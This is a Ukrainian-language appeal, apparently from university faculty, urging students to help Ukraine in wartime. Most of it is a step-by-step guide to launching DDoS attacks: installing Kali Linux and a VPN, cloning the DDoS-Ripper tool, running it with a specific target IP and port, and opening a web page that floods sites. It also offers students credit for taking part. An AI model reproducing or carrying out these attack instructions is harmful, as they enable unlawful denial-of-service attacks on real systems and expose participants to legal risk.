Шановні студенти та викладачі! Закликаємо до участі!

Шановні студенти та викладачі! Закликаємо до участі!

Як допомогти в наші складні часи є питання у багатьох! Особливо у тих, хто не може взяти зброю у руки та захищати нашу країну, з різних причин!

Надаємо розгорнуту варіанти, які ви можете використати для підтримки Нашої України!

Кожен обирає собі той варіант, який вважає коректним! Використання для розваг та збагачення забороняється! Порушення майна та гідності громадян інших країн, що не мають відношення до агресії по відношенню до України та інших країн, ЗАБОРОНЯЄТЬСЯ!!!!

Якщо певні автори будуть проти ми видалимо посилання на їх ресурси!

1)                 Інструкція як організувати кібератака на ворогів України https://github.com/AlexTrushkovsky/NoWarDDoS якщо не розібралися пишемо в телеграм канал «disBalancer UKRAINE» або до автора цього гіта!

2)                 Для продвинутих користувачів підготовка компа:

2.0  Інструкція нова 

2.1   Скачуємо віртуалку(https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html).

2.2   Завантажуємо Калі Лінукс (https://kali.download/base-images/kali-2022.1/kali-linux-2022.1-installer-amd64.iso.torrent)

2.3   Встановлюємо віртуальну машину — https://www.youtube.com/watch?v=9QXXyG0hKtI&ab_channel=ProgrammingKnowledge

2.4   Встановлюємо Калі лінкус на віртуальну машину — https://www.youtube.com/watch?v=UbGYDDnFAEg&ab_channel=ProgrammingKnowledge

2.5   Заходимо в браузер на системі Калі і в адресну строку вставляємо це посилання — https://protonvpn.com/download/protonvpn-stable-release_1.0.1-1_all.deb. Воно завантажить потрібний файл. Після чого з папки Завантаження\Downloads перемістіть файл на робочий стіл та пропишіть цю команду в консолі — sudo apt-get install /home/userName/Стільниця/protonvpn-stable-release_1.0.1-1_all.deb. Замість  /home/userName/Стільниця/ вставсте в скріпт шлях до вашого файлу, який ви перекиеули на робочий стіл. Щоб дізнатись шлях — нажміть правою кнопкою по файлу і відкриється контекстне меню де оберіть Властивості. Скопіюйте адресу і вставсе в скріпт.

2.6   Після чого пропешіть команду — sudo apt-get update

2.7   Потім пропишіть — sudo apt-get install protonvpn.

2.8   Встановлюємо DDos Ripper.  в консолі

— sudo apt install git

— git clone https://github.com/palahsu/DDoS-Ripper.git

2.9   Файли, які були завантажені з гіта знаходяться в Домашня тека та що на робочому столі.  Встановлення python3.

— sudo apt-get update

-sudo apt-get install python3

2.10           Вмикаємо ВПН. У верхньому лівому куті натисніть на лого Калі. Відкриється меню схоже до віндовса. В пошуковій строці напишіть proton і натисніть на іконку. Після того як протон загрузиться вам буде потрібно зареєстнувати акаунт. Кроки там елементарні, тому розберетесь. Якщо ні, то пишіть в приват або тут.

2.11           Після реєстрації зайдіть в впн та авторизуйтесь. І оберіть одну з трьох доступних країн. Або натисніть на quick connect. Якщо не Впн не підключається спробуйте підключитись до іншої країни.

2.12           Запускаємо скріпти. В папці Домашня тека натискаємо правою кнопкою по папці DDoS-Ripper. Після чого натискаємо на Відкрити термінал тут.

2.13           Коли відкриється термінал — в ньому пишемо — python3 DRipper.py -s 85.118.181.8 -p 80 -t 135. де -s це ip. -p — port  -t є не обов’язковим.

2.14           Якщо виникнуть якісь питання, то пишіть https://t.me/IFAlice

 3)                 Завантажте TOR https://www.torproject.org/ru/download/ и запускаємо його, а потім копіюємо посилання https://stop-russian-desinformation.near.page/, навіть у декількох вкладках і відбувається атака сайтів окупантів. Якщо сторінка видалена чи не активна 
скачуємо архів і відкриваємо через ТОР! Увага! Відкрийте диспетчер задач і якщо ЦП вашого комп’ютера сильно завантажено то відкрийте файл в будь якому редакторі та зменшить кількість сайтів, але робіть вибірку в довільному порядку, а не виділяти фрагментом!   

4)                 Завантажте TOR https://www.torproject.org/ru/download/ и реєструємося вконтакті, однокласниках та інших ресурсах (також можливо зареєструвати пошту) і розміщуємо наступну інформації, а також надсилаємо на своїм знайомим для поширення з
4.1.      https://t.me/Pravda_Gerashchenko/890 та https://t.me/Pravda_Gerashchenko/891
4.2       https://t.me/u_now/20738

АЛЕ ЯКЩО БУДИТЕ ПИСАТИ ЛЮДЯМ З КРАЇН АГРЕСОРІВ НЕ ПОТРІБНО ПРОЯВЛЯТИ АГРЕСІЮ! МАКСИМАЛЬНО ПОЯСНІТЬ ЯКА СИТУАЦІЯ В НАШІЙ КРАЇНІ!

5)                 Відслідковуйте людей, які на своїх сторінках проводять заклик до агресії чи принижують гідність українського народу спробуйте пояснити чи додайте до статей коментарі з поясненнями з 3 пункту! На офіційних ресурсах теж можна, навіть якщо його видаляють чи не пропустять це буде додатковий вклад!

6)                 Якщо маєте бажання допомогти грошима https://bank.gov.ua/ua/news/all/natsionalniy-bank-vidkriv-spetsrahunok-dlya-zboru-koshtiv-na-potrebi-armiyi

 

Усім студентам хто прийме участь у таких заходах це буде враховано!

 

З повагою до усіх,
декан Факультету АКС Андрій Форсюк!

В.о. зав. кафедрою інформатики Сергій Грибков.

0